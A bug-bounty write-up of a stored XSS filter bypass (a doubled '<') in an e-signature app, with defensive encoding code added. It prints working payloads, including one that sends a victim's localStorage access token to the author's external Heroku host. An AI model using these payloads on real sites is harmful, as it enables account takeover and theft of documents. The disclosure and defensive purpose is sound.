Account Takeover via XSS in e-signature feature worth $2500

Gökhan Güzelkokar
2 min read · Sep 7, 2021


Hi everyone, I hope all is well. I was hacking an HR application and started testing the integrated applications on it. My target was the HR application, but I wanted to try something on this app; I didn't even know they had a bug bounty program. Just for fun. Damn, I really like this. One of the integrated applications I started testing had an electronic signature feature: you prepare a PDF document and send it to someone else to sign.

When I tried an XSS payload in the name field, like "><img onerror=alert(document.domain) src>, everything was okay: the filter encoded it. The output was:

&quot;&gt;&lt;img onerror=alert(document.domain) src&gt;

Then I realized that this isn't the XSS payload I always use 😇 Are you ready for this payload? Here it is:

"><<img onerror=alert(document.cookie) src>

Yes, just one more '<'. I got an alert in the admin page from an unauthenticated user. The output was:

&quot;&gt;<img onerror=alert(document.cookie) src>

I needed to research this further, but I didn't have much time in those days. I found this bug 8 months ago. I'm sorry for not being able to go into detail.

Sometimes filters can be bypassed as simply as that. Developers can sometimes make far worse mistakes. We are all human; we all make mistakes… So keep your eyes open and stay focused to catch bugs. This was a popular app used by many other companies 😑
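As an added example (not the author's code, nor the vendor's), here is the defensive pattern that makes this whole class of bypass moot: encode every special character once, at the HTML sink, instead of pattern-filtering the input. The renderSignerCard template and the injectedTagCount check are assumptions for illustration; the two payloads are the ones quoted above.

```javascript
// Constructed test inputs: the two payloads from the write-up. The first one was
// encoded by the filter, the second (doubled '<') got through.
const PAYLOAD_SINGLE = '"><img onerror=alert(document.domain) src>';
const PAYLOAD_DOUBLE = '"><<img onerror=alert(document.cookie) src>';

// Encoder for HTML text and double-quoted attribute values. Every occurrence of
// every special character is replaced, so there is no "first match only" or
// "strip one tag" step for a doubled character to slip past.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hypothetical admin-view template for a signer's name (assumed markup).
// Vulnerable form: the untrusted name is interpolated raw into the markup.
function renderSignerCardUnsafe(name) {
  return `<div class="signer" data-name="${name}">${name}</div>`;
}

// Hardened form: the name is encoded once, at the sink, for both contexts it lands in.
function renderSignerCard(name) {
  const safe = escapeHtml(name);
  return `<div class="signer" data-name="${safe}">${safe}</div>`;
}

// Regression check for CI: count tag openers in the rendered fragment and subtract
// the two the template itself contributes (<div ...> and </div>). Any remainder is a
// tag that came from user input.
function injectedTagCount(rendered) {
  const openers = rendered.match(/<\/?[a-zA-Z]/g) || [];
  return openers.length - 2;
}
```

Running the check over both renderers shows the unsafe template leaks a tag for either payload, while the encoded one never does.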

What about impact? The local storage was really juicy: it held an access_token, which was more than enough for us 😇 Yes, everything was in local storage. To steal localStorage I used this payload:

"><<img src=x onerror=this.src='https://gkhck.herokuapp.com/p?cookie='+JSON.stringify(localStorage) />

Note: you can also use https://github.com/projectdiscovery/interactsh as the callback listener.

When the XSS triggered, everything landed in my Heroku logs. Okay, this is account takeover, but what can we do with this account? This application integrates with many cloud storage applications; if the account is connected to one of them, we have access to all the files in it. We can also access all signed documents and company files.
